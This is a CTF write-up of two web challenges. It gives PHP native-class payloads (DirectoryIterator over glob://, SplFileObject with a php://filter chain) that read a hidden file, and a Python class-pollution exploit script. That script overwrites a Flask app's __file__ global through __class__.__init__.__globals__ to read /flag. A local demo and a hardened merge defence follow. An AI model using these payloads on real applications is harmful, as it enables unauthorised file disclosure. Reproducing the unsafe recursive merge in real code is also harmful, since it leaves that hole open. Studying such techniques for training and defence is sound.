[Week4] Can't we just read the flag directly?
Payloads (PHP native class instantiation: each parameter pair evidently supplies a class name and its constructor argument):
?K=DirectoryIterator&W=glob:///secret/*
J=SplFileObject&H=php://filter/read=convert.base64-encode/resource=/secret/f11444g.php
The first request lists /secret/ through DirectoryIterator over the glob:// wrapper, which reveals the file name (here f11444g.php); the second reads that file with SplFileObject through a php://filter base64 chain, so the PHP source comes back encoded instead of being executed.
[Week4] 圣钥之战1.0 (Battle of the Sacred Key 1.0)
On entering, the challenge page tells you to go to /read to find the flag.
Visiting /read returns the application's own source code:
```python
from flask import Flask, request
import json

app = Flask(__name__)


# Recursive merge: dict-like targets are written with [], anything else
# with getattr/setattr, so nested JSON keys can walk through object
# attributes. This is the pollution primitive.
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


def is_json(data):
    try:
        json.loads(data)
        return True
    except ValueError:
        return False


class cls():
    def __init__(self):
        pass


instance = cls()


@app.route('/', methods=['GET', 'POST'])
def hello_world():
    return open('/static/index.html', encoding="utf-8").read()


@app.route('/read', methods=['GET', 'POST'])
def Read():
    # Opens whatever the module-level __file__ currently points at: the
    # app's own source, unless that global has been overwritten.
    file = open(__file__, encoding="utf-8").read()
    # Response text: "J1ngHong says: you want to read the flag? Then the light
    # of the sacred key will stop you! The source is fine though, since you
    # can't read the flag anyway (lol)"
    return f"""J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag(乐)
{file}
"""


@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
    if request.is_json:
        merge(json.loads(request.data), instance)
    else:
        # "J1ngHong says: the sacred key is pure, no one can pollute it!"
        return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
    # "J1ngHong says: the sacred key dimmed a little, you actually polluted it?"
    return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```
This is a prototype-pollution style challenge (the Python flavour, often called class pollution; the "pollute" hint in the challenge already gives it away).
From the code: we POST JSON to /pollute and merge recursively merges it into instance. For targets with __getitem__ it writes with dst[k] = v; for everything else it uses hasattr/getattr/setattr, so a chain of JSON keys can walk from instance to instance.__class__ (cls), from cls to cls.__init__ (a plain function, because cls defines its own __init__, so it has a __globals__ attribute), and from there to __init__.__globals__, which is the app module's global namespace. /read does file = open(__file__, encoding="utf-8").read(), and __file__ is one of those globals: the existing value is truthy but our replacement is a string rather than a dict, so merge takes the dst[k] = v branch and simply overwrites it. After that, /read returns whatever path we chose instead of the source. Since ".." above "/" stays at "/", the path "/../../flag" used below resolves to /flag.
exp:
```python
import requests
import json

base = "http://challenge.basectf.fun:23859"
url = base + "/pollute"

# Key chain: instance -> __class__ (cls) -> __init__ (function)
#            -> __globals__ (module namespace) -> __file__
# "/../../flag" normalises to /flag, where the flag is assumed to live.
data = {
    "__class__": {
        "__init__": {
            "__globals__": {
                "__file__": "/../../flag"
            }
        }
    }
}

# Serialise to JSON and send it with a JSON Content-Type so request.is_json is true
json_data = json.dumps(data)
response = requests.post(url, data=json_data, headers={'Content-Type': 'application/json'})
print(response.text)  # J1ngHong说:圣钥暗淡了一点,你居然污染成功了? ("...you actually polluted it?")

# /read now opens the polluted __file__ instead of the app source
print(requests.get(base + "/read").text)
```
Now go back to the challenge and visit /read to get the flag.
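To see the attribute walk and a fix without the remote target, here is an added example that is not part of the writeup or the challenge code. It reproduces the challenge's merge and cls locally, sends the same key chain to overwrite the module's __file__ with a constructed marker path, and then shows a hardened safe_merge that refuses underscore-prefixed keys and only updates attributes that already exist on the target instance. The Settings class, PAYLOAD and the /tmp/polluted marker are assumptions made up for the demonstration.

```python
import os

# --- vulnerable side: same shape as the challenge's merge() and cls ---------
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


class cls():
    def __init__(self):
        pass


instance = cls()

# Constructed attacker JSON (assumed): the writeup's key chain, but aimed at a
# harmless marker path instead of the flag.
PAYLOAD = {"__class__": {"__init__": {"__globals__": {"__file__": "/tmp/polluted"}}}}


def pollute_vulnerable():
    """Walk instance -> cls -> cls.__init__ -> __globals__ and overwrite __file__.

    Returns the module-level __file__ afterwards, i.e. what /read would open.
    cls.__init__ is a plain function (cls defines its own __init__), so it
    carries a __globals__ attribute pointing at this module's namespace.
    """
    merge(PAYLOAD, instance)
    return globals()["__file__"]


def open_target(path):
    """Where open(path) ends up: '..' above '/' stays at '/', so '/../../flag' is '/flag'."""
    return os.path.normpath(path)


# --- hardened side: an assumed replacement merge for the same use case -------
def safe_merge(src, dst):
    """Merge JSON into dst without touching dunder/private names or creating
    attributes: dicts get dict semantics, objects only have their *existing*
    public instance attributes updated."""
    for k, v in src.items():
        if not isinstance(k, str) or k.startswith('_'):
            raise ValueError(f"refusing key {k!r}")
        if isinstance(dst, dict):
            if isinstance(v, dict) and isinstance(dst.get(k), dict):
                safe_merge(v, dst[k])
            else:
                dst[k] = v
        else:
            attrs = vars(dst)  # instance __dict__ only: no class attrs, no __class__
            if k not in attrs:
                raise ValueError(f"unknown attribute {k!r}")
            if isinstance(v, dict) and isinstance(attrs[k], dict):
                safe_merge(v, attrs[k])
            else:
                setattr(dst, k, v)


class Settings:
    """Assumed legitimate merge target with a nested dict, to show safe_merge still works."""
    def __init__(self):
        self.name = "default"
        self.limits = {"rps": 10}


def legit_update():
    s = Settings()
    safe_merge({"name": "prod", "limits": {"rps": 50}}, s)
    return s.name, s.limits["rps"]


def pollute_hardened():
    """Same attacker payload against safe_merge: the first dunder key is rejected."""
    s = Settings()
    try:
        safe_merge(PAYLOAD, s)
    except ValueError:
        return "refused"
    return "merged"


if __name__ == "__main__":
    print("vulnerable __file__ after merge:", pollute_vulnerable())
    print("/read would open:", open_target("/../../flag"))
    print("legit update via safe_merge:", legit_update())
    print("payload via safe_merge:", pollute_hardened())
```

The key check in safe_merge is the cheap, general defence: any recursive merge that is allowed to step through __class__, __init__ or __globals__ can reach module globals, so rejecting underscore-prefixed keys at the input boundary closes the whole family of paths, and restricting writes to names already present in vars(dst) stops attribute creation on the instance as well.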